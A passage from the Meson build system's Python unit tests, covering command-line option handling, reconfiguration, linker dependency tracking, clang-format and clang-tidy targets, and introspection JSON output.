https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = [r'{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': 'undefined'
}
]
}
self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
